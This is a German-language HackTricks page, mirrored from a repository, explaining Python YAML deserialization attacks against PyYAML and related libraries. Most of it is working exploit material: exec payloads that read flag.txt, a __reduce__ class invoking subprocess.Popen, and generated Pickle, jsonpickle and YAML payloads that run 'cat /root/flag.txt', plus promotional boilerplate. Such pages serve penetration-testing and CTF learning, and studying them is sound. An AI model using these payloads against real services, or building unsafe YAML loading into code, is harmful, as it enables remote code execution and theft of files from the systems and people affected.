Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00

Translator workflow 6af5d4e1a0 Translated to German

2024-02-10 15:36:32 +00:00

7.9 KiB

Raw Blame History

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.

Yaml Deserialisierung

Die Yaml-Python-Bibliotheken können nicht nur Rohdaten, sondern auch Python-Objekte serialisieren:

print(yaml.dump(str("lol")))
lol
...

print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l

print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1

Überprüfen Sie, wie das Tuple kein Rohdatentyp ist und daher wurde es serialisiert. Das Gleiche geschah mit dem Range (aus den Builtins entnommen).

safe_load() oder safe_load_all() verwenden SafeLoader und unterstützen keine Deserialisierung von Klassenobjekten. Beispiel für die Deserialisierung von Klassenobjekten:

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:builtins.range [1, 10, 1]'

print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
print(yaml.load(data, Loader=Loader)) #range(1, 10)
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load(data)) #range(1, 10)
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>

#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object

Der vorherige Code verwendete unsafe_load, um die serialisierte Python-Klasse zu laden. Dies liegt daran, dass in Version >= 5.1 das Deserialisieren einer serialisierten Python-Klasse oder Klassenattributs nicht erlaubt ist, wenn beim Laden kein Loader angegeben ist oder Loader=SafeLoader.

Grundlegender Exploit

Beispiel, wie man einen Sleep-Befehl ausführt:

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:time.sleep [2]'
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
print(yaml.load(data, Loader=Loader)) #Executed
print(yaml.load_all(data))
print(yaml.load_all(data, Loader=Loader))
print(yaml.load_all(data, Loader=UnsafeLoader))
print(yaml.load_all(data, Loader=FullLoader))
print(yaml.unsafe_load(data)) #Executed
print(yaml.full_load_all(data))
print(yaml.unsafe_load_all(data))

Verwundbare .load("<Inhalt>") ohne Loader

Alte Versionen von pyyaml waren anfällig für Deserialisierungsangriffe, wenn Sie beim Laden von etwas den Loader nicht angegeben haben: yaml.load(data)

Sie können die Beschreibung der Schwachstelle hier finden (https://hackmd.io/@defund/HJZajCVlP). Der vorgeschlagene Angriff auf dieser Seite ist:

!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec

Oder Sie können auch diese Einzeiler-Funktion von @ishaack verwenden:

!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}

Beachten Sie, dass Sie in neueren Versionen nicht mehr .load() ohne einen Loader aufrufen können und der FullLoader für diese Art von Angriff nicht mehr anfällig ist.

RCE

Benutzerdefinierte Payloads können mithilfe von Python YAML-Modulen wie PyYAML oder ruamel.yaml erstellt werden. Diese Payloads können Schwachstellen in Systemen ausnutzen, die nicht vertrauenswürdige Eingaben ohne ordnungsgemäße Bereinigung deserialisieren.

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import subprocess

class Payload(object):
def __reduce__(self):
return (subprocess.Popen,('ls',))

deserialized_data = yaml.dump(Payload()) # serializing data
print(deserialized_data)

#!!python/object/apply:subprocess.Popen
#- ls

print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
print(yaml.unsafe_load(deserialized_data))

Tool zum Erstellen von Payloads

Das Tool https://github.com/j0lt-github/python-deserialization-attack-payload-generator kann verwendet werden, um Python-Deserialisierungspayloads zu generieren, um Pickle, PyYAML, jsonpickle und ruamel.yaml zu missbrauchen:

python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
Done Saving file !!!!

cat /tmp/example_jspick
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}

cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==

cat /tmp/example_yaml
!!python/object/apply:subprocess.Popen
- !!python/tuple
- cat
- /root/flag.txt

Referenzen